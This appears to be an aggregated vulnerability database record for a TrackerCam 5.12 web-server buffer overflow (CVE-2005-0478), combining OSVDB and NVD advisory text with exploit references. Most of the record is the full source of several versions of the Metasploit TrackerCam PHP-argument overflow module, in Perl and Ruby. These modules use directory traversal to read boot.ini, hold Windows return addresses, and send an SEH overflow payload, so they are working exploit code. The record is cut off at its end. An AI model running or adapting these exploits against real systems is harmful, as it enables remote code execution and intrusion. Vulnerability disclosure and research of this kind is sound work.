ID: OSVDB:13952 | Type: osvdb | Reporter: Luigi Auriemma (aluigi@autistici.org) | Modified: 2005-02-18T13:57:12
Description
Vulnerability Description
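A remotely exploitable buffer overflow exists in TrackerCam. The server fails to properly validate the User-Agent header of an HTTP request, resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code, resulting in a loss of integrity. CVE-2005-0478 covers both this User-Agent overflow and the separate PHP-argument overflow (OSVDB:13953), and the exploit modules referenced in this record target the PHP-argument variant rather than the User-Agent one. The CVSS v2 vector recorded for this entry (score 5.0) rates only a partial availability impact, which understates the code-execution impact described here, so triage should not rely on the score alone.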
Solution Description
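As of this entry's last modification (2005-02-18), there are no known upgrades, patches, or workarounds available to correct this issue. In the absence of a fix, limiting network access to the TrackerCam web server reduces exposure.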
Short Description
A remotely exploitable buffer overflow exists in TrackerCam. The server fails to properly validate the User-Agent header of an HTTP request, resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code, resulting in a loss of integrity.
{"enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-04-28T13:20:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0478"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:36461", "PACKETSTORM:82949"]}, {"type": "osvdb", "idList": ["OSVDB:13953"]}, {"type": "exploitdb", "idList": ["EDB-ID:16811"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/TRACKERCAM_PHPARG_OVERFLOW"]}, {"type": "nessus", "idList": ["TRACKERCAM_MULTIPLE_VULNERABILITIES.NASL"]}], "modified": "2017-04-28T13:20:09", "rev": 2}, "vulnersScore": 7.4}, "bulletinFamily": "software", "affectedSoftware": [{"name": "TrackerCam", "operator": "eq", "version": "5.12"}], "references": [], "href": "https://vulners.com/osvdb/OSVDB:13952", "id": "OSVDB:13952", "title": "TrackerCam HTTP User-Agent Field Remote Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:09", "edition": 1, "reporter": "Luigi Auriemma(aluigi@autistici.org)", "description": "## Vulnerability Description\nA remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.trackercam.com\nSecurity Tracker: 1013238\n[Secunia Advisory ID:14344](https://secuniaresearch.flexerasoftware.com/advisories/14344/)\n[Related OSVDB ID: 13954](https://vulners.com/osvdb/OSVDB:13954)\n[Related OSVDB ID: 13958](https://vulners.com/osvdb/OSVDB:13958)\n[Related OSVDB ID: 13953](https://vulners.com/osvdb/OSVDB:13953)\n[Related OSVDB ID: 13957](https://vulners.com/osvdb/OSVDB:13957)\n[Related OSVDB ID: 13955](https://vulners.com/osvdb/OSVDB:13955)\n[Related OSVDB ID: 13956](https://vulners.com/osvdb/OSVDB:13956)\nOther Advisory URL: http://aluigi.altervista.org/adv/tcambof-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0388.html\n[CVE-2005-0478](https://vulners.com/cve/CVE-2005-0478)\n", "modified": "2005-02-18T13:57:12", "viewCount": 3, "published": "2005-02-18T13:57:12", "cvelist": ["CVE-2005-0478"]}
{"cve": [{"lastseen": "2020-12-09T19:22:18", "description": "Multiple buffer overflows in TrackerCam 5.12 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) an HTTP request with a long User-Agent header or (2) a long argument to an arbitrary PHP script.", "edition": 5, "cvss3": {}, "published": "2005-03-30T05:00:00", "title": "CVE-2005-0478", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0478"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:trackercam:trackercam:5.12"], "id": "CVE-2005-0478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0478", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:trackercam:trackercam:5.12:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:13:59", "description": "", "published": "2005-03-05T00:00:00", "type": "packetstorm", "title": "trackercam_phparg_overflow.pm", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2005-03-05T00:00:00", "id": "PACKETSTORM:36461", "href": "https://packetstormsecurity.com/files/36461/trackercam_phparg_overflow.pm.html", "sourceData": "` \n## \n# This file is part of the Metasploit Framework and may be redistributed \n# according to the licenses defined in the Authors field below. In the \n# case of an unknown or missing license, this file defaults to the same \n# license as the core Framework (dual GPLv2 and Artistic). 
The latest \n# version of the Framework can always be obtained from metasploit.com. \n## \n \npackage Msf::Exploit::trackercam_phparg_overflow; \nuse base \"Msf::Exploit\"; \nuse strict; \nuse Pex::Text; \n \nmy $advanced = { }; \n \nmy $info = \n{ \n'Name' => 'TrackerCam PHP Argument Buffer Overflow', \n'Version' => '$Revision: 1.3 $', \n'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ], \n'Arch' => [ 'x86' ], \n'OS' => [ 'win32'], \n'Priv' => 1, \n'AutoOpts' => { 'EXITFUNC' => 'thread' }, \n \n'UserOpts' => \n{ \n'RHOST' => [1, 'ADDR', 'The target address'], \n'RPORT' => [1, 'PORT', 'The target port', 8090], \n}, \n \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'Prepend' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", # add esp, -3500 \n'Keys' => ['+ws2ord'], \n}, \n \n'Description' => Pex::Text::Freeform(qq{ \nThis module exploits a simple stack overflow in the TrackerCam web \nserver. All current versions of this software are vulnerable to a large \nnumber of security issues. This module abuses the directory traversal \nflaw to gain information about the system and then uses the PHP overflow \nto execute arbitrary code. \n}), \n \n'Refs' => \n[ \n['OSVDB', '13953'], \n['OSVDB', '13955'], \n['CVE', '2005-0478'], \n['BID', '12592'], \n['URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'], \n], \n \n'Targets' => \n[ \n# EyeWD.exe has a null and we can not use a partial overwrite. \n# All of the loaded application DLLs have a null in the address... \n# Except CPS.dl, which moves around between instances. 
\n \n# Windows XP SP2 and Windows 2003 are not supported yet :-/ \n \n['Windows 2000 English', 0x75022ac4 ], # ws2help.dll \n['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll \n['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll \n], \n \n'Keys' => ['trackercam'], \n}; \n \nsub new { \nmy $class = shift; \nmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); \nreturn($self); \n} \n \nsub Check { \nmy $self = shift; \nmy $s = $self->Connect; \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn $self->CheckCode('Connect'); \n} \n \n$self->PrintLine(\"[*] Querying the remote web server...\"); \n \nmy $path = \"/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3\"; \nmy $req = \"GET $path HTTP/1.0\\r\\n\\r\\n\"; \n \n$s->Send($req); \nmy $res = $s->Recv(-1, 5); \n$s->Close; \n \nif ($res =~ /fsockopen/) { \n$self->PrintLine(\"[*] Vulnerable TrackerCam instance discovered\"); \n$self->Fingerprint(); \nreturn $self->CheckCode('Confirmed'); \n} \n \n$self->PrintLine(\"[*] This TrackerCam service appears to be patched\"); \nreturn $self->CheckCode('Safe'); \n} \n \nsub Exploit { \nmy $self = shift; \nmy $target_idx = $self->GetVar('TARGET'); \nmy $shellcode = $self->GetVar('EncodedPayload')->Payload; \nmy $target = $self->Targets->[$target_idx]; \n \n$self->PrintLine(\"[*] Attempting to exploit target \" . $target->[0]); \n \nmy $s = $self->Connect; \n \nif ($s->IsError) { \n$self->PrintLine('[*] Error creating socket: ' . $s->GetError); \nreturn; \n} \n \nmy $bang = Pex::Text::EnglishText(8192); \n \n# Simple as pie. \nsubstr($bang, 257, 4, pack('V', $target->[1])); \nsubstr($bang, 253, 2, \"\\xeb\\x06\"); \nsubstr($bang, 261, length($shellcode), $shellcode); \n \nmy $data = \"GET /tuner/TunerGuide.php3?userID=$bang HTTP/1.0\\r\\n\\r\\n\"; \n \n$self->PrintLine(\"[*] Sending \" .length($data) . 
\" bytes to remote host.\"); \n$s->Send($data); \n$s->Recv(-1, 5); \n \nreturn; \n} \n \n# Uses the directory traversal vulnerability to detect the remote OS version \nsub Fingerprint { \nmy $self = shift; \nmy $data = $self->DownloadFile('nobody.txt'); \n \nif (! $data ) { \n$self->PrintLine(\"[*] Download failed for remote test file\"); \nreturn; \n} \n \nmy ($path) = $data =~ m/in <b>(.*)<\\/b> on line/smi; \n$self->PrintLine(\"[*] Install path: $path\") if $path; \n \nif (uc(substr($path, 0, 1)) ne 'C') { \n$self->PrintLine(\"[*] TrackerCam is probably not installed on the system drive\"); \n} \n \nif ($data !~ /Program Files/) { \n$self->PrintLine(\"[*] TrackerCam is installed in a non-standard location\"); \n \n} \n \n$data = $self->DownloadFile('boot.ini'); \nif (! $data ) { \n$self->PrintLine(\"[*] Download failed for remote boot.ini file\"); \nreturn; \n} \n \n# Windows XP SP2 \nif ($data =~ /Windows XP.*NoExecute/i) { \n$self->PrintLine(\"[*] Detected Windows XP SP2\"); \nreturn 'WinXPSP2'; \n} \n \nif ($data =~ /Windows XP/) { \n$self->PrintLine(\"[*] Detected Windows XP SP0-SP1\"); \nreturn 'WinXPSP01'; \n} \n \nif ($data =~ /Windows.*2003/) { \n$self->PrintLine(\"[*] Detected Windows 2003 Server\"); \nreturn 'Win2003'; \n} \n \nif ($data =~ /Windows.*2000/) { \n$self->PrintLine(\"[*] Detected Windows 2000\"); \nreturn 'Win2000'; \n} \n \n$self->PrintLine(\"[*] Could not identify this system\"); \nreturn; \n} \n \nsub DownloadFile { \nmy $self = shift; \nmy $file = shift; \n \nmy $s = $self->Connect; \nreturn if $s->IsError; \n \nmy $path = \"/tuner/ComGetLogFile.php3?fn=../../../../../../../../../$file\"; \nmy $req = \"GET $path HTTP/1.0\\r\\n\\r\\n\"; \n \n$s->Send($req); \nmy $res = $s->Recv(8192, 5); \n$s->Close; \n \nreturn if ($res !~ /tuner\\.css/ || $res !~ /\\<pre\\>/ ); \n \nmy ($data) = $res =~ m/<pre>(.*)/smi; \n$data =~ s/<\\/pre><\\/body>.*//g if $data; \n \nreturn $res if ! 
$data; \nreturn $data; \n} \n \nsub Connect { \nmy $self = shift; \nmy $s = Msf::Socket::Tcp->new \n( \n'PeerAddr' => $self->GetVar('RHOST'), \n'PeerPort' => $self->GetVar('RPORT'), \n'SSL' => $self->GetVar('SSL'), \n'LocalPort' => $self->GetVar('CPORT'), \n); \nreturn $s; \n} \n \n1; \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/36461/trackercam_phparg_overflow.pm"}, {"lastseen": "2016-12-05T22:12:18", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "TrackerCam PHP Argument Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82949", "href": "https://packetstormsecurity.com/files/82949/TrackerCam-PHP-Argument-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'TrackerCam PHP Argument Buffer Overflow', \n'Description' => %q{ \nThis module exploits a simple stack overflow in the \nTrackerCam web server. All current versions of this software \nare vulnerable to a large number of security issues. This \nmodule abuses the directory traversal flaw to gain \ninformation about the system and then uses the PHP overflow \nto execute arbitrary code. 
\n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-0478'], \n[ 'OSVDB', '13953'], \n[ 'OSVDB', '13955'], \n[ 'BID', '12592'], \n[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'], \n \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# EyeWD.exe has a null and we can not use a partial overwrite. \n# All of the loaded application DLLs have a null in the address, \n# except CPS.dll, which moves around between instances :-( \n \n['Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll \n['Windows XP English SP0/SP1', { 'Ret' => 0x71aa32ad }], # ws2help.dll \n['Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll \n \n# Windows XP SP2 and Windows 2003 are not supported yet :-/ \n], \n'DisclosureDate' => 'Feb 18 2005', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8090) \n], self.class) \nend \n \ndef check \nres = send_request_raw({ \n'uri' => '/tuner/ComGetLogFile.php3', \n'query' => 'fn=../HTTPRoot/socket.php3' \n}, 5) \n \nif (res and res.body =~ /fsockopen/) \nfp = fingerprint() \nprint_status(\"Detected a vulnerable TrackerCam installation on #{fp}\") \nreturn Exploit::CheckCode::Confirmed \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nc = connect \n \nbuf = rand_text_english(8192) \nseh = generate_seh_payload(target.ret) \nbuf[257, seh.length] = seh \n \nprint_status(\"Sending request...\") \nres = send_request_raw({ \n'uri' => '/tuner/TunerGuide.php3', \n'query' => 'userID=' + buf \n}, 5) \n \nhandler \nend \n \ndef download(path) \n \nres = send_request_raw({ \n'uri' => '/tuner/ComGetLogFile.php3', \n'query' => 'fn=' + (\"../\" * 10) + path \n}, 5) \n \nreturn if !(res and 
res.body and res.body =~ /tuner\\.css/ and res.body =~ /<pre>/) \n \nm = res.match(/<pre>(.*)<\\/pre><\\/body>/smi) \nreturn if not m \nreturn m[1] \nend \n \ndef fingerprint \n \nres = download(rand_text_alphanumeric(12) + '.txt') \nreturn if not res \n \nm = res.match(/in <b>(.*)<\\/b> on line/smi) \nreturn if not m \n \npath = m[1] \n \nprint_status(\"TrackerCam installation path is #{path}\") \n \nif (path !~ /^C/i) \nprint_status(\"TrackerCam is not installed on the system drive, we can't fingerprint it\") \nreturn \nend \n \nif (path !~ /Program Files/i) \nprint_status(\"TrackerCam is installed in a non-standard location\") \nend \n \nboot = download('boot.ini') \nreturn if not boot \n \ncase boot \nwhen /Windows XP.*NoExecute/i \nreturn \"Windows XP SP2+\" \nwhen /Windows XP/ \nreturn \"Windows XP SP0-SP1\" \nwhen /Windows.*2003/ \nreturn \"Windows 2003\" \nwhen /Windows.*2000/ \nreturn \"Windows 2000\" \nelse \nreturn \"Unknown OS/SP\" \nend \nend \n \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82949/trackercam_phparg_overflow.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "cvelist": ["CVE-2005-0478"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in TrackerCam. The server fails to validate arguments supplied to any PHP script resulting in a buffer overflow. With a specially crafted request, an attacker can potentially cause the execution of arbitrary code or crash the server process.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in TrackerCam. The server fails to validate arguments supplied to any PHP script resulting in a buffer overflow. 
With a specially crafted request, an attacker can potentially cause the execution of arbitrary code or crash the server process.\n## Manual Testing Notes\nhttp://[victim]:8090/MessageBoard/messages.php?aaaaaaaaaaa...aaaa\n## References:\nVendor URL: http://www.trackercam.com\nSecurity Tracker: 1013238\n[Secunia Advisory ID:14344](https://secuniaresearch.flexerasoftware.com/advisories/14344/)\n[Related OSVDB ID: 13954](https://vulners.com/osvdb/OSVDB:13954)\n[Related OSVDB ID: 13958](https://vulners.com/osvdb/OSVDB:13958)\n[Related OSVDB ID: 13957](https://vulners.com/osvdb/OSVDB:13957)\n[Related OSVDB ID: 13952](https://vulners.com/osvdb/OSVDB:13952)\n[Related OSVDB ID: 13955](https://vulners.com/osvdb/OSVDB:13955)\n[Related OSVDB ID: 13956](https://vulners.com/osvdb/OSVDB:13956)\nOther Advisory URL: http://aluigi.altervista.org/adv/tcambof-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0388.html\n[CVE-2005-0478](https://vulners.com/cve/CVE-2005-0478)\n", "modified": "2005-02-18T13:57:12", "published": "2005-02-18T13:57:12", "href": "https://vulners.com/osvdb/OSVDB:13953", "id": "OSVDB:13953", "title": "TrackerCam PHP Argument Remote Overflow", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T06:33:55", "description": "TrackerCam PHP Argument Buffer Overflow. CVE-2005-0478. Webapps exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "TrackerCam PHP Argument Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16811", "href": "https://www.exploit-db.com/exploits/16811/", "sourceData": "##\r\n# $Id: trackercam_phparg_overflow.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'TrackerCam PHP Argument Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a simple stack buffer overflow in the\r\n\t\t\t\tTrackerCam web server. All current versions of this software\r\n\t\t\t\tare vulnerable to a large number of security issues. This\r\n\t\t\t\tmodule abuses the directory traversal flaw to gain\r\n\t\t\t\tinformation about the system and then uses the PHP overflow\r\n\t\t\t\tto execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0478'],\r\n\t\t\t\t\t[ 'OSVDB', '13953'],\r\n\t\t\t\t\t[ 'OSVDB', '13955'],\r\n\t\t\t\t\t[ 'BID', '12592'],\r\n\t\t\t\t\t[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# EyeWD.exe has a null and we can not use a partial overwrite.\r\n\t\t\t\t\t# All of the loaded application DLLs have a null in the address,\r\n\t\t\t\t\t# except CPS.dll, which moves around between instances :-(\r\n\r\n\t\t\t\t\t['Windows 2000 English',\t\t{ 'Ret' => 0x75022ac4 }], # 
ws2help.dll\r\n\t\t\t\t\t['Windows XP English SP0/SP1',\t{ 'Ret' => 0x71aa32ad }], # ws2help.dll\r\n\t\t\t\t\t['Windows NT 4.0 SP4/SP5/SP6',\t{ 'Ret' => 0x77681799 }], # ws2help.dll\r\n\r\n\t\t\t\t\t# Windows XP SP2 and Windows 2003 are not supported yet :-/\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(8090)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/tuner/ComGetLogFile.php3',\r\n\t\t\t'query' => 'fn=../HTTPRoot/socket.php3'\r\n\t\t}, 5)\r\n\r\n\t\tif (res and res.body =~ /fsockopen/)\r\n\t\t\tfp = fingerprint()\r\n\t\t\tprint_status(\"Detected a vulnerable TrackerCam installation on #{fp}\")\r\n\t\t\treturn Exploit::CheckCode::Confirmed\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tc = connect\r\n\r\n\t\tbuf = rand_text_english(8192)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tbuf[257, seh.length] = seh\r\n\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/tuner/TunerGuide.php3',\r\n\t\t\t'query' => 'userID=' + buf\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef download(path)\r\n\r\n\t\tres = send_request_raw({\r\n\t\t\t'uri' => '/tuner/ComGetLogFile.php3',\r\n\t\t\t'query' => 'fn=' + (\"../\" * 10) + path\r\n\t\t}, 5)\r\n\r\n\t\treturn if !(res and res.body and res.body =~ /tuner\\.css/ and res.body =~ /<pre>/)\r\n\r\n\t\tm = res.match(/<pre>(.*)<\\/pre><\\/body>/smi)\r\n\t\treturn if not m\r\n\t\treturn m[1]\r\n\tend\r\n\r\n\tdef fingerprint\r\n\r\n\t\tres = download(rand_text_alphanumeric(12) + '.txt')\r\n\t\treturn if not res\r\n\r\n\t\tm = res.match(/in <b>(.*)<\\/b> on line/smi)\r\n\t\treturn if not m\r\n\r\n\t\tpath = m[1]\r\n\r\n\t\tprint_status(\"TrackerCam installation path is #{path}\")\r\n\r\n\t\tif (path !~ /^C/i)\r\n\t\t\tprint_status(\"TrackerCam is not installed on the system drive, 
we can't fingerprint it\")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif (path !~ /Program Files/i)\r\n\t\t\tprint_status(\"TrackerCam is installed in a non-standard location\")\r\n\t\tend\r\n\r\n\t\tboot = download('boot.ini')\r\n\t\treturn if not boot\r\n\r\n\t\tcase boot\r\n\t\t\twhen /Windows XP.*NoExecute/i\r\n\t\t\t\treturn \"Windows XP SP2+\"\r\n\t\t\twhen /Windows XP/\r\n\t\t\t\treturn \"Windows XP SP0-SP1\"\r\n\t\t\twhen /Windows.*2003/\r\n\t\t\t\treturn \"Windows 2003\"\r\n\t\t\twhen /Windows.*2000/\r\n\t\t\t\treturn \"Windows 2000\"\r\n\t\t\telse\r\n\t\t\t\treturn \"Unknown OS/SP\"\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16811/"}], "metasploit": [{"lastseen": "2020-08-12T23:59:09", "description": "This module exploits a simple stack buffer overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "TrackerCam PHP Argument Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0478"], "modified": "2017-08-14T05:40:17", "id": "MSF:EXPLOIT/WINDOWS/HTTP/TRACKERCAM_PHPARG_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TrackerCam PHP Argument Buffer Overflow',\n 'Description' => %q{\n This module exploits a simple stack buffer overflow in the\n TrackerCam web server. 
All current versions of this software\n are vulnerable to a large number of security issues. This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0478'],\n [ 'OSVDB', '13953'],\n [ 'OSVDB', '13955'],\n [ 'BID', '12592'],\n [ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # EyeWD.exe has a null and we can not use a partial overwrite.\n # All of the loaded application DLLs have a null in the address,\n # except CPS.dll, which moves around between instances :-(\n\n ['Windows 2000 English',\t\t{ 'Ret' => 0x75022ac4 }], # ws2help.dll\n ['Windows XP English SP0/SP1',\t{ 'Ret' => 0x71aa32ad }], # ws2help.dll\n ['Windows NT 4.0 SP4/SP5/SP6',\t{ 'Ret' => 0x77681799 }], # ws2help.dll\n\n # Windows XP SP2 and Windows 2003 are not supported yet :-/\n ],\n 'DisclosureDate' => 'Feb 18 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8090)\n ])\n end\n\n def check\n res = send_request_raw({\n 'uri' => '/tuner/ComGetLogFile.php3',\n 'query' => 'fn=../HTTPRoot/socket.php3'\n }, 5)\n\n if (res and res.body =~ /fsockopen/)\n fp = fingerprint()\n vprint_status(\"Detected a vulnerable TrackerCam installation on #{fp}\")\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n c = connect\n\n buf = rand_text_english(8192)\n seh = generate_seh_payload(target.ret)\n buf[257, seh.length] = seh\n\n print_status(\"Sending request...\")\n res = send_request_raw({\n 'uri' => '/tuner/TunerGuide.php3',\n 'query' => 'userID=' + buf\n }, 5)\n\n 
handler\n end\n\n def download_log(path)\n\n res = send_request_raw({\n 'uri' => '/tuner/ComGetLogFile.php3',\n 'query' => 'fn=' + (\"../\" * 10) + path\n }, 5)\n\n return if !(res and res.body and res.body =~ /tuner\\.css/ and res.body =~ /<pre>/)\n\n m = res.match(/<pre>(.*)<\\/pre><\\/body>/smi)\n return if not m\n return m[1]\n end\n\n def fingerprint\n\n res = download_log(rand_text_alphanumeric(12) + '.txt')\n return if not res\n\n m = res.match(/in <b>(.*)<\\/b> on line/smi)\n return if not m\n\n path = m[1]\n\n print_status(\"TrackerCam installation path is #{path}\")\n\n if (path !~ /^C/i)\n print_status(\"TrackerCam is not installed on the system drive, we can't fingerprint it\")\n return\n end\n\n if (path !~ /Program Files/i)\n print_status(\"TrackerCam is installed in a non-standard location\")\n end\n\n boot = download_log('boot.ini')\n return if not boot\n\n case boot\n when /Windows XP.*NoExecute/i\n return \"Windows XP SP2+\"\n when /Windows XP/\n return \"Windows XP SP0-SP1\"\n when /Windows.*2003/\n return \"Windows 2003\"\n when /Windows.*2000/\n return \"Windows 2000\"\n else\n return \"Unknown OS/SP\"\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": 